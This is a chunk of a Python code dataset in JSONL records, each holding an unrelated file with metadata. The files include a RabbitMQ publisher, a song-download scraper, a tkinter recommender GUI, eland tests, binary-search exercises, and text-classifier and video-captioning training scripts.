print(\"Cleaning ...\")\n if sender_conn.fileno() > 0:\n print(\"Sender socket was still open. Closing ...\")\n sender_conn.close()\n receiver.close()\n\n print(\"RECEIVER STOP\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"networking/socket/s05_select/receiver.py","file_name":"receiver.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"441764144","text":"class Solution:\n def queensAttacktheKing(self, queens: List[List[int]], king: List[int]) -> List[List[int]]:\n res = []\n directions = [[-1, 0], [1, 0], [0, 1], [0, -1], [1, 1], [1, -1], [-1, 1], [-1, -1]]\n for direction in directions:\n k = 1\n while 0 <= king[0] + k * direction[0] < 9 and 0 <= king[1] + k * direction[1] < 9:\n pos = [king[0] + k * direction[0], king[1] + k * direction[1]]\n if pos in queens:\n res.append(pos)\n break\n else:\n k += 1\n return res\n","sub_path":"Array/1222. Queens That Can Attack the King.py","file_name":"1222. Queens That Can Attack the King.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"569350158","text":"import sys\nimport time\nimport datetime\nimport pika\n\n\ndef pub(n_sec):\n start = datetime.datetime.now()\n cnt = 0\n connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\n channel = connection.channel()\n channel.queue_declare(queue='hello') # queue 생성\n\n def pub_():\n channel.basic_publish(exchange='', routing_key='hello', body=str(time.time()),\n properties=pika.BasicProperties(timestamp=int(time.time())))\n\n while True:\n pub_()\n if datetime.datetime.now() > start + datetime.timedelta(seconds=n_sec):\n break\n cnt += 1\n print(f\"published {cnt / n_sec} msgs\")\n\n\n\n\n\nif __name__ == '__main__':\n\n pub(10)","sub_path":"rabbitMQ/rabbit_pub_throughput.py","file_name":"rabbit_pub_throughput.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"479317419","text":"import urllib.request\r\nfrom bs4 import BeautifulSoup\r\nimport json\r\nimport os\r\n\r\n# 获取目录\r\ndir_path = os.getcwd()\r\nprint(dir_path)\r\n\r\nsong_path = dir_path + \"/download_songs/\"\r\n\r\nurl_path = dir_path + \"/url.txt\"\r\n\r\n\r\ndef get_json(url):\r\n data = urllib.request.urlopen(url.decode('ASCII')).read().decode('UTF-8') # 爬取网页的响应数据,使用utf-8重新编码\r\n\r\n # print(data) # 打印处理过的响应数据\r\n\r\n soup = BeautifulSoup(data, \"lxml\") # 返回BeautifulSoup对象,使用lxml解析器\r\n\r\n target_info_str = str(soup.findAll('script')[-6].get_text())[18:-2] # 找到对应我们目标标签中的json内容\r\n\r\n # print(target_info_str) # 打印目标信息json\r\n\r\n json_dic = json.loads(target_info_str) # 将json信息转化为python字典\r\n\r\n # print(json_dic['shareid']) # 打印字典中键为shareid的值,测试是否成功\r\n\r\n # json格式化后转化为字符串\r\n dumped_json_data = json.dumps(json_dic, sort_keys=True, indent=4, separators=(',', ':'), ensure_ascii=False)\r\n\r\n # 打印格式化后的字符串\r\n # print(dumped_json_data)\r\n\r\n file_url = json_dic['detail']['playurl']\r\n\r\n # 打印我们最终需求的下载地址\r\n # print(file_url)\r\n\r\n # 更改fname进行重命名,默认更改为用户昵称+歌曲名称+后缀(.m4a)\r\n\r\n # 先获取用户昵称\r\n user_name = json_dic['detail']['nick']\r\n\r\n # 再获取歌曲名称\r\n song_name = json_dic['detail']['song_name']\r\n\r\n # 得到默认文件名\r\n file_name_normal = user_name + \"_\" + song_name + \".m4a\"\r\n\r\n # 打印默认文件名\r\n print(file_name_normal)\r\n\r\n # 返回参数\r\n return file_url, file_name_normal\r\n\r\n\r\ndef download_song(file_url, file_name_normal):\r\n # 下载文件到main.py同级目录\r\n print(\"下载中\")\r\n f = urllib.request.urlopen(file_url)\r\n with open(song_path + file_name_normal, \"wb\") as code:\r\n code.write(f.read())\r\n print(\"下载成功\")\r\n\r\n\r\nwith open(url_path, \"rb\") as url_txt:\r\n urls = url_txt.read().splitlines()\r\n for url_meta in urls:\r\n print(url_meta)\r\n file_url_meta, file_name_normal_meta = get_json(url_meta)\r\n download_song(file_url_meta, file_name_normal_meta)\r\n # file_name, file_name_normal = get_json(url_txt_name)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"src/linux_main.py","file_name":"linux_main.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"310853000","text":"from tkinter import *\r\nimport pickle\r\nglobal fur\r\nglobal q\r\n\r\n# loading dumped datafiles\r\nfur = sorted(pickle.load(open(\"fur1.p\", \"rb\")))\r\noff = sorted(pickle.load(open(\"off1.p\", \"rb\")))\r\ntec = sorted(pickle.load(open(\"tec1.p\", \"rb\")))\r\nproduct = pickle.load(open(\"Product_Recommendation.p\", \"rb\"))\r\ndata = pickle.load(open(\"4yrsBMW.p\", \"rb\"))\r\ndata = data[:370]\r\n\r\n# window configuration\r\nroot = Tk()\r\nroot.title(\"Personalized Experience (Product Recommendation)\")\r\nroot.configure(background='#7E85AB')\r\nroot.geometry(\"900x600\")\r\nroot.resizable(0,0)\r\n\r\n\r\n#Function to return furniture products\r\ndef doprintfur(val):\r\n \r\n print(fu.get())\r\n #listb = Listbox(root, width = 40, height = 15)\r\n \r\n for i in range(len(data['d_product'])):\r\n if data['d_product'][i] == fu.get():\r\n print(i)\r\n Recommendations=[]\r\n for u in range(len(product[i])):\r\n if (product[i]['score'][u] > 0):\r\n Recommendations.append(product[i]['item2'][u])\r\n print(\"\\n\\n Recommendations for\",data['d_product'][i],\" \\n\",Recommendations[:5])\r\n listb.delete(0, END)\r\n b = 1\r\n Recommendations= sorted(Recommendations[:5])\r\n for a in Recommendations[:5]:\r\n listb.insert(END, '{}. {}'.format(b, a))\r\n b+=1\r\n#Function to return Office products \r\ndef doprintoff(val):\r\n \r\n print(of.get())\r\n #listb = Listbox(root, width = 40, height = 15)\r\n \r\n for i in range(len(data['d_product'])):\r\n if data['d_product'][i] == of.get():\r\n print(i)\r\n Recommendations=[]\r\n for u in range(len(product[i])):\r\n if (product[i]['score'][u] > 0):\r\n Recommendations.append(product[i]['item2'][u])\r\n print(\"\\n\\n Recommendations for\",data['d_product'][i],\" \\n\",Recommendations[:5])\r\n listb.delete(0, END)\r\n b = 1\r\n Recommendations= sorted(Recommendations[:5])\r\n for a in Recommendations[:5]:\r\n listb.insert(END, '{}. {}'.format(b, a))\r\n b+=1\r\n\r\n#Function to return Technology products\r\ndef doprinttec(val):\r\n global Recommendations\r\n Recommendations = []\r\n print(te.get())\r\n #listb = Listbox(root, width = 40, height = 15)\r\n \r\n for i in range(len(data['d_product'])):\r\n if data['d_product'][i] == te.get():\r\n print(i)\r\n for u in range(len(product[i])):\r\n if (product[i]['score'][u] > 0):\r\n Recommendations.append(product[i]['item2'][u])\r\n print(\"\\n\\n Recommendations for\",data['d_product'][i],\" \\n\",Recommendations[:5])\r\n listb.delete(0, END)\r\n b = 1\r\n Recommendations= sorted(Recommendations[:5])\r\n for a in Recommendations[:5]:\r\n listb.insert(END, '{}. 
{}'.format(b, a))\r\n b+=1\r\n\r\ntoprec = Label(root, text = 'Top 5 recommendations : ', background='#7E85AB', fg = 'white')\r\ntoprec.place(relx = 0.35, rely = 0.36)\r\n \r\nlistb = Listbox(root, width = 80, height = 5)\r\nlistb.place(relx = 0.2, rely = 0.4)\r\n\r\nfurLabel = Label(root,text='Furniture Products : ', background='#7E85AB', fg = 'white')\r\nfurLabel.place(relx = 0.05, rely = 0.09)\r\n\r\nfu = StringVar(root)\r\nfu.set(fur[0])\r\nfurDropdown = OptionMenu(root, fu,*fur, command=doprintfur)\r\nfurDropdown.configure(width = '30', anchor = 'w')\r\nfurDropdown.place(relx = 0.05, rely = 0.12)\r\n\r\noffLabel = Label(root,text='Office Products : ', background='#7E85AB', fg = 'white')\r\noffLabel.place(relx = 0.37, rely = 0.09)\r\n\r\nof = StringVar(root)\r\nof.set(off[0])\r\noffDropdown = OptionMenu(root, of,*off, command=doprintoff)\r\noffDropdown.configure(width = '30', anchor = 'w')\r\noffDropdown.place(relx = 0.37, rely = 0.12)\r\n\r\ntecLabel = Label(root,text='Technology Products : ', background='#7E85AB', fg = 'white')\r\ntecLabel.place(relx = 0.70, rely = 0.09)\r\n\r\nte = StringVar(root)\r\nte.set(tec[0])\r\ntecDropdown = OptionMenu(root, te,*tec, command=doprinttec)\r\ntecDropdown.configure(width = '30', anchor = 'w')\r\ntecDropdown.place(relx = 0.70, rely = 0.12)\r\n\r\nroot.mainloop()\r\n","sub_path":"GUI/personalised_gui.py","file_name":"personalised_gui.py","file_ext":"py","file_size_in_byte":4035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"443102425","text":"# Licensed to Elasticsearch B.V under one or more agreements.\n# Elasticsearch B.V licenses this file to you under the Apache 2.0 License.\n# See the LICENSE file in the project root for more information\n\n# File called _pytest for PyCharm compatability\nimport pytest\n\nfrom eland.field_mappings import FieldMappings\nfrom eland.tests import ES_TEST_CLIENT, ECOMMERCE_INDEX_NAME\nfrom eland.tests.common import TestData\n\n\nclass TestAggregatables(TestData):\n @pytest.mark.filterwarnings(\"ignore:Aggregations not supported\")\n def test_ecommerce_all_aggregatables(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n aggregatables = ed_field_mappings.aggregatable_field_names()\n\n expected = {\n \"category.keyword\": \"category\",\n \"currency\": \"currency\",\n \"customer_birth_date\": \"customer_birth_date\",\n \"customer_first_name.keyword\": \"customer_first_name\",\n \"customer_full_name.keyword\": \"customer_full_name\",\n \"customer_id\": \"customer_id\",\n \"customer_last_name.keyword\": \"customer_last_name\",\n \"customer_phone\": \"customer_phone\",\n \"day_of_week\": \"day_of_week\",\n \"day_of_week_i\": \"day_of_week_i\",\n \"email\": \"email\",\n \"geoip.city_name\": \"geoip.city_name\",\n \"geoip.continent_name\": \"geoip.continent_name\",\n \"geoip.country_iso_code\": \"geoip.country_iso_code\",\n \"geoip.location\": \"geoip.location\",\n \"geoip.region_name\": \"geoip.region_name\",\n \"manufacturer.keyword\": \"manufacturer\",\n \"order_date\": \"order_date\",\n \"order_id\": \"order_id\",\n \"products._id.keyword\": \"products._id\",\n \"products.base_price\": \"products.base_price\",\n \"products.base_unit_price\": \"products.base_unit_price\",\n \"products.category.keyword\": \"products.category\",\n \"products.created_on\": \"products.created_on\",\n \"products.discount_amount\": \"products.discount_amount\",\n \"products.discount_percentage\": \"products.discount_percentage\",\n \"products.manufacturer.keyword\": \"products.manufacturer\",\n \"products.min_price\": \"products.min_price\",\n \"products.price\": \"products.price\",\n \"products.product_id\": \"products.product_id\",\n \"products.product_name.keyword\": \"products.product_name\",\n \"products.quantity\": \"products.quantity\",\n \"products.sku\": \"products.sku\",\n \"products.tax_amount\": \"products.tax_amount\",\n \"products.taxful_price\": \"products.taxful_price\",\n \"products.taxless_price\": \"products.taxless_price\",\n \"products.unit_discount_amount\": \"products.unit_discount_amount\",\n \"sku\": \"sku\",\n \"taxful_total_price\": \"taxful_total_price\",\n \"taxless_total_price\": \"taxless_total_price\",\n \"total_quantity\": \"total_quantity\",\n \"total_unique_products\": \"total_unique_products\",\n \"type\": \"type\",\n \"user\": \"user\",\n }\n\n assert expected == aggregatables\n\n def test_ecommerce_selected_aggregatables(self):\n expected = {\n \"category.keyword\": \"category\",\n \"currency\": \"currency\",\n \"customer_birth_date\": \"customer_birth_date\",\n \"customer_first_name.keyword\": \"customer_first_name\",\n \"type\": \"type\",\n \"user\": \"user\",\n }\n\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT,\n index_pattern=ECOMMERCE_INDEX_NAME,\n display_names=expected.values(),\n )\n\n aggregatables = ed_field_mappings.aggregatable_field_names()\n\n assert expected == aggregatables\n\n def test_ecommerce_single_aggregatable_field(self):\n ed_field_mappings = 
FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n assert \"user\" == ed_field_mappings.aggregatable_field_name(\"user\")\n\n def test_ecommerce_single_keyword_aggregatable_field(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n assert (\n \"customer_first_name.keyword\"\n == ed_field_mappings.aggregatable_field_name(\"customer_first_name\")\n )\n\n def test_ecommerce_single_non_existant_field(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n with pytest.raises(KeyError):\n ed_field_mappings.aggregatable_field_name(\"non_existant\")\n\n @pytest.mark.filterwarnings(\"ignore:Aggregations not supported\")\n def test_ecommerce_single_non_aggregatable_field(self):\n ed_field_mappings = FieldMappings(\n client=ES_TEST_CLIENT, index_pattern=ECOMMERCE_INDEX_NAME\n )\n\n assert None is ed_field_mappings.aggregatable_field_name(\"customer_gender\")\n","sub_path":"eland/tests/field_mappings/test_aggregatables_pytest.py","file_name":"test_aggregatables_pytest.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"38622455","text":"#!/bin/python3\n\nimport random\n\ndef find_smallest_positive(xs):\n '''\n Assume that xs is a list of numbers sorted from LOWEST to HIGHEST.\n Find the index of the smallest positive number.\n If no such index exists, return `None`.\n\n HINT: \n This is essentially the binary search algorithm from class,\n but you're always searching for 0.\n\n >>> find_smallest_positive([-3, -2, -1, 0, 1, 2, 3])\n 4\n >>> find_smallest_positive([1, 2, 3])\n 0\n >>> find_smallest_positive([-3, -2, -1]) is None\n True\n '''\n left = 0\n right = len(xs)-1\n\n def go(left,right):\n mid = (left+right)//2\n\n if len(xs) == 0:\n return None\n if xs[left] > 0:\n return left\n if xs[right] < 0:\n return None\n if xs[mid] > 0:\n right = mid -1\n if xs[mid] < 0:\n left = mid+1\n if xs[mid] == 0:\n return mid+1\n\n return go(left,right)\n return go(left,right)\n\ndef _included(xs, x):\n '''\n >>> _included([5,4,3,3,3,3,3,3,3,2,1], 3)\n True\n >>> _included([1,2,3], 4)\n False\n '''\n left =0\n right = len(xs)-1\n \n if len(xs) == 0:\n return False\n\n def go(left,right):\n mid = (left+right)//2\n \n if right == left and xs[right] != x:\n return False\n if x > xs[mid]:\n right = mid-1\n return go(left,right)\n elif x < xs[mid]:\n left = mid+1\n return go(left,right)\n else:\n return True\n return go(left,right)\n\ndef _small_lowest_index(xs,x):\n '''\n >>> _small_lowest_index([5,4,3,3,3,3,3,3,3,2,1], 3)\n 2\n >>> _small_lowest_index([1,2,3], 4)\n 0\n '''\n left = 0\n right = len(xs)-1\n \n def go(left,right):\n mid = (left+right)//2\n \n if x > xs[mid]:\n right = mid-1\n return go(left,right)\n elif x < xs[mid]:\n left = mid+1\n return go(left,right)\n else:\n right = mid-1\n if xs[mid-1]!=x or mid == 0:\n return mid\n else:\n return go(left,right)\n # return go(left,right)\n # return go(left,right)\n return go(left, right)\n\n\ndef _big_lowest_index(xs,x):\n '''\n >>> _big_lowest_index([5,4,3,3,3,3,3,3,3,2,1], 3)\n 8\n >>> _big_lowest_index([1,2,3], 4)\n 0\n '''\n left = 0\n right = len(xs)-1\n \n def go(left,right):\n mid = (left+right)//2\n \n if x > xs[mid]:\n right = mid-1\n return go(left,right)\n\n elif x < xs[mid]:\n left = mid+1\n return go(left,right)\n else:\n \n left = mid+1\n if mid == (len(xs)-1) or xs[mid+1]!= x:\n return mid\n else:\n return go(left,right)\n # return go(left,right)\n # return go(left,right)\n return go(left, right)\n \n\ndef count_repeats(xs, x):\n '''\n Assume that xs is a list of numbers sorted from HIGHEST to LOWEST,\n and that x is a number.\n Calculate the number of times that x occurs in xs.\n\n HINT: \n Use the following three step procedure:\n 1) use binary search to find the lowest index with a value >= x\n 2) use binary search to find the lowest index with a value < x\n 3) return the difference between step 1 and 2\n\n I highly recommend creating stand-alone functions for steps 1 and 2\n that you can test independently.\n\n >>> count_repeats([5, 4, 3, 3, 3, 3, 3, 3, 3, 2, 1], 3)\n 7\n >>> count_repeats([1, 2, 3], 4)\n 0\n '''\n \n\n if _included(xs, x):\n high = _big_lowest_index(xs, x)\n small = _small_lowest_index(xs, x)\n return (high - small) + 1\n else:\n return 0\n \n \n\n\ndef argmin(f, lo, hi, epsilon=1e-3):\n '''\n Assumes that f is an input function that takes a float as input and returns a float with a unique global minimum,\n and that lo and hi are both floats satisfying lo < hi.\n Returns a number that is within epsilon of the value that minimizes f(x) over the interval [lo,hi]\n\n HINT:\n The basic algorithm is:\n 1) The base case 
is when hi-lo < epsilon\n 2) For each recursive call:\n a) select two points m1 and m2 that are between lo and hi\n b) one of the 4 points (lo,m1,m2,hi) must be the smallest;\n depending on which one is the smallest, \n you recursively call your function on the interval [lo,m2] or [m1,hi]\n\n >>> argmin(lambda x: (x-5)**2, -20, 20)\n 5.000040370009773\n >>> argmin(lambda x: (x-5)**2, -20, 0)\n -0.00016935087808430278\n '''\n \n if hi - lo < epsilon:\n return (lo+hi)/2\n else:\n m1 = lo + (hi-lo)/4\n\n m2 = hi - (hi-lo)/2\n \n if f(m1) < f(m2):\n return argmin(f, lo, m2, epsilon)\n\n else:\n return argmin(f, m1, hi, epsilon)\n","sub_path":"binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":4951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"209983681","text":"import sys\nimport nltk\nnltk.download(['punkt','wordnet','averaged_perceptron_tagger','stopwords'])\n\n# import libraries\nfrom nltk.stem.porter import PorterStemmer\nfrom nltk.stem.wordnet import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk import pos_tag\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.metrics import confusion_matrix, accuracy_score\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import BernoulliNB\n\nfrom sklearn.pipeline import Pipeline, FeatureUnion\nfrom sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.multioutput import MultiOutputClassifier\nfrom sklearn.metrics import fbeta_score,classification_report,make_scorer\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nimport sklearn.externals.joblib as extjoblib\nimport joblib\nimport re\nimport pandas as pd\nimport sqlite3\nimport numpy as np\n\n\ndef load_data(database_filepath):\n '''\n Input: database_filepath(Provided in the main function)\n This load the data produced in data/process_data.py file. Also returns X, y and category names to be used for\n train test split\n Output: X, y, categor_names\n '''\n # Load dataset from database \n db = sqlite3.connect('data/messages_categories.db')\n cursor = db.cursor()\n cursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n tables = cursor.fetchall()[0][0]\n df = pd.read_sql_query('SELECT * FROM '+tables,db)\n\n print(df)\n\n X = df['message']\n y = df[df.columns[4:]]\n category_names = list(df.columns[4:])\n\n print(y)\n\n return X, y, category_names\n\ndef tokenize(text):\n '''\n Input: Messages from X\n\n Output: tokenized and lemmetize text for improved model\n\n '''\n # normalize text and remove punctuation\n text = re.sub(r\"[^a-zA-Z0-9]\", \" \", text.lower())\n \n # tokenize text\n tokens = word_tokenize(text)\n stop_words = stopwords.words(\"english\")\n words = [w for w in tokens if w not in stop_words]\n \n # Reduce words to their root form\n lemmatizer = WordNetLemmatizer()\n lemmed = [lemmatizer.lemmatize(w) for w in words]\n \n return lemmed\n\n\ndef build_model(X, y):\n '''\n Input: X_train, y_train = from train test split in main function\n\n Output: Model using the pipeline and best parameters using grid search\n '''\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf',MultiOutputClassifier(RandomForestClassifier())),\n ])\n\n \n parameters = {\n 'vect__max_df': (0.5, 0.75, 1.0),\n 'vect__ngram_range': ((1, 1), (1,2)),\n 'vect__max_features': (None, 5000,10000),\n 'tfidf__use_idf': (True, False)\n }\n\n gs_clf = GridSearchCV(pipeline, param_grid=parameters)\n\n return gs_clf\n\ndef evaluate_model(model, X_test, y_test, category_names):\n #see the score for each category\n y_pred = model.predict(X_test)\n y_pred_pd = pd.DataFrame(y_pred, columns = y_test.columns)\n for column in y_test.columns:\n print('------------------------------------------------------\\n')\n print('Category: {}\\n'.format(column))\n print(classification_report(y_test[column],y_pred_pd[column]))\n\ndef save_model(model, model_filepath):\n 
# save the model as a pkl file\n    joblib.dump(model.best_estimator_, model_filepath)\n\n\ndef main():\n    \"\"\"\n    Input in the cmd: 'python models/train_classifier.py data/messages_categories.db models/model1.pkl'\n    ***[1] python models/train_classifier.py - to run the program\n    ***[2] data/messages_categories.db: Database that was produced by data/process_data.py\n    ***[3] models/model1.pkl: Pickle file that will be produced by this program (models/train_classifier.py)\n    \"\"\"\n    if len(sys.argv) == 3:\n        database_filepath, model_filepath = sys.argv[1:]\n        \n        print('Loading data...\\n    DATABASE: {}'.format(database_filepath))\n        X, y, category_names = load_data(database_filepath)\n\n        print(X, y, category_names)\n        X_train, X_test, y_train, y_test = train_test_split(X, y)\n        \n        print('Building model...')\n        model = build_model()\n\n        print('Training model...')\n        model.fit(X_train, y_train) \n        \n        print('Evaluating model...')\n        evaluate_model(model, X_test, y_test, category_names)\n\n        print('Saving model...\\n    MODEL: {}'.format(model_filepath))\n        save_model(model, model_filepath)\n\n        print('Trained model saved!')\n\n    else:\n        print('Please provide the filepath of the disaster messages database '\\\n              'as the first argument and the filepath of the pickle file to '\\\n              'save the model to as the second argument. \\n\\nExample: python '\\\n              'train_classifier.py ../data/DisasterResponse.db classifier.pkl')\nif __name__ == '__main__':\n    main()","sub_path":"models/train_classifier.py","file_name":"train_classifier.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"197648255","text":"''' Training Scropt for V2C captioning task. '''\r\n\r\nimport os\r\nimport numpy as np\r\nfrom opts import *\r\nfrom utils.utils import *\r\nimport torch.optim as optim\r\nfrom model.Model import HybirdNet as Model\r\nfrom torch.utils.data import DataLoader\r\nfrom utils.dataloader import VideoDataset\r\nfrom model.transformer.Optim import ScheduledOptim\r\nimport torch\r\n\r\ndef train(loader, model, optimizer, opt, cap_vocab, cms_vocab):\r\n\r\n model.train()\r\n\r\n for epoch in range(1, opt['epochs']+1):\r\n iteration = 0\r\n cap_n_correct_total = 0\r\n cms_int_n_correct_total = 0\r\n cms_eff_n_correct_total = 0\r\n cms_att_n_correct_total = 0\r\n n_word_total = 0\r\n cms_int_n_word_total = 0\r\n cms_eff_n_word_total = 0\r\n cms_att_n_word_total = 0\r\n cap_train_loss_total = 0\r\n cms_int_train_loss_total = 0\r\n cms_eff_train_loss_total = 0\r\n cms_att_train_loss_total = 0\r\n\r\n for data in loader:\r\n torch.cuda.synchronize()\r\n\r\n cms_labels_int = data['int_labels']\r\n cms_labels_eff = data['eff_labels']\r\n cms_labels_att = data['att_labels']\r\n\r\n if opt['cuda']:\r\n fc_feats = data['fc_feats'].cuda()\r\n i3d = data['i3d'].cuda()\r\n audio = data['audio'].cuda()\r\n cap_labels = data['cap_labels'].cuda()\r\n cms_labels_int = cms_labels_int.cuda()\r\n cms_labels_eff = cms_labels_eff.cuda()\r\n cms_labels_att = cms_labels_att.cuda()\r\n\r\n optimizer.zero_grad()\r\n cap_pos = pos_emb_generation(cap_labels)\r\n cms_pos_int = pos_emb_generation(cms_labels_int)\r\n cms_pos_eff = pos_emb_generation(cms_labels_eff)\r\n cms_pos_att = pos_emb_generation(cms_labels_att)\r\n\r\n\r\n cap_probs, cms_int_probs, cms_eff_probs, cms_att_probs = model(fc_feats, i3d, audio, cap_labels, cap_pos, cms_labels_int, cms_pos_int,\r\n cms_labels_eff, cms_pos_eff, cms_labels_att, cms_pos_att)\r\n\r\n # note: currently we just used most naive cross-entropy as training objective,\r\n # advanced loss func. 
like SELF-CRIT, different loss weights, or stronger video features\r\n            # may boost performance, but that is not the goal of this work.\r\n            cap_loss, cap_n_correct = cal_performance(cap_probs, cap_labels[:, 1:], smoothing=True)\r\n            cms_int_loss, cms_int_n_correct = cal_performance(cms_int_probs, cms_labels_int[:, 1:], smoothing=True)\r\n            cms_eff_loss, cms_eff_n_correct = cal_performance(cms_eff_probs, cms_labels_eff[:, 1:], smoothing=True)\r\n            cms_att_loss, cms_att_n_correct = cal_performance(cms_att_probs, cms_labels_att[:, 1:], smoothing=True)\r\n\r\n            # compute the token prediction Acc.\r\n            non_pad_mask = cap_labels[:, 1:].ne(Constants.PAD)\r\n            n_word = non_pad_mask.sum().item()\r\n\r\n            cms_int_non_pad_mask = cms_labels_int[:, 1:].ne(Constants.PAD)\r\n            cms_int_n_word = cms_int_non_pad_mask.sum().item()\r\n\r\n            cms_eff_non_pad_mask = cms_labels_eff[:, 1:].ne(Constants.PAD)\r\n            cms_eff_n_word = cms_eff_non_pad_mask.sum().item()\r\n\r\n            cms_att_non_pad_mask = cms_labels_att[:, 1:].ne(Constants.PAD)\r\n            cms_att_n_word = cms_att_non_pad_mask.sum().item()\r\n\r\n            cap_loss /= n_word\r\n            cms_int_loss /= cms_int_n_word\r\n            cms_eff_loss /= cms_eff_n_word\r\n            cms_att_loss /= cms_att_n_word\r\n\r\n            loss = cap_loss + cms_int_loss + cms_eff_loss + cms_att_loss\r\n\r\n            loss.backward()\r\n            # clip gradients before the optimizer step so the clipping actually affects the update\r\n            torch.nn.utils.clip_grad_norm_(filter(lambda p: p.requires_grad, model.parameters()), 1)\r\n            optimizer.step_and_update_lr()\r\n\r\n            # update parameters\r\n            cap_train_loss = cap_loss.item()\r\n            cms_int_train_loss = cms_int_loss.item()\r\n            cms_eff_train_loss = cms_eff_loss.item()\r\n            cms_att_train_loss = cms_att_loss.item()\r\n\r\n            # multi-gpu case, not necessary in newer PyTorch version or on single GPU.\r\n            if opt['cuda']: torch.cuda.synchronize()\r\n\r\n            iteration += 1\r\n            cap_n_correct_total += cap_n_correct\r\n            cms_int_n_correct_total += cms_int_n_correct\r\n            cms_eff_n_correct_total += cms_eff_n_correct\r\n            cms_att_n_correct_total += cms_att_n_correct\r\n            n_word_total += n_word\r\n            cms_int_n_word_total += cms_int_n_word\r\n            cms_eff_n_word_total += cms_eff_n_word\r\n            cms_att_n_word_total += cms_att_n_word\r\n            cap_train_loss_total += cap_train_loss\r\n            cms_int_train_loss_total += cms_int_train_loss\r\n            cms_eff_train_loss_total += cms_eff_train_loss\r\n            cms_att_train_loss_total += cms_att_train_loss\r\n\r\n            if iteration % opt['print_loss_every'] == 0:\r\n                print('iter %d (epoch %d), cap_train_loss = %.6f, cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,'\r\n                      ' current step = %d, current lr = %.3E, cap_acc = %.3f, cms_int_acc = %.3f, cms_eff_acc = %.3f, cms_att_acc = %.3f'\r\n                      % (iteration, epoch, cap_train_loss, cms_int_train_loss, cms_eff_train_loss, cms_att_train_loss, optimizer.n_current_steps,\r\n                         optimizer._optimizer.param_groups[0]['lr'],\r\n                         cap_n_correct/n_word, cms_int_n_correct/cms_int_n_word, cms_eff_n_correct/cms_eff_n_word, cms_att_n_correct/cms_att_n_word))\r\n\r\n            # show the intermediate generations\r\n            if opt['show_predict']:\r\n                cap_pr, cap_gt = show_prediction(cap_probs, cap_labels[:, :-1], cap_vocab, caption=True)\r\n                cms_int_pr, cms_int_gt = show_prediction(cms_int_probs, cms_labels_int[:, :-1], cms_vocab,\r\n                                                         caption=False)\r\n                cms_eff_pr, cms_eff_gt = show_prediction(cms_eff_probs, cms_labels_eff[:, :-1], cms_vocab,\r\n                                                         caption=False)\r\n                cms_att_pr, cms_att_gt = show_prediction(cms_att_probs, cms_labels_att[:, :-1], cms_vocab,\r\n                                                         caption=False)\r\n                print(' \\n')\r\n\r\n                with open(opt['info_path'], 'a') as f:\r\n                    f.write('model_%d, cap_loss: %.6f, 
cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,\\n'\r\n % (epoch, cap_train_loss / iteration, cms_int_train_loss / iteration,\r\n cms_eff_train_loss / iteration,\r\n cms_att_train_loss / iteration))\r\n f.write('\\n %s \\n %s' % (cap_pr, cap_gt))\r\n f.write('\\n %s \\n %s' % (cms_int_pr, cms_int_gt))\r\n f.write('\\n %s \\n %s' % (cms_eff_pr, cms_eff_gt))\r\n f.write('\\n %s \\n %s' % (cms_att_pr, cms_att_gt))\r\n f.write('\\n')\r\n\r\n print('model_%d, cap_loss: %.6f, cms_int_train_loss = %.6f, cms_eff_train_loss = %.6f, cms_att_train_loss = %.6f,'\r\n 'cap_acc = %.3f, cms_int_acc = %.3f, cms_eff_acc = %.3f, cms_att_acc = %.3f\\n'\r\n % (epoch, cap_train_loss_total / iteration, cms_int_train_loss_total / iteration, cms_eff_train_loss_total / iteration, cms_att_train_loss_total / iteration,\r\n cap_n_correct_total/n_word_total, cms_int_n_correct_total/cms_int_n_word_total, cms_eff_n_correct_total/cms_eff_n_word_total, cms_att_n_correct_total/cms_att_n_word_total))\r\n\r\n\r\n if epoch % opt['save_checkpoint_every'] == 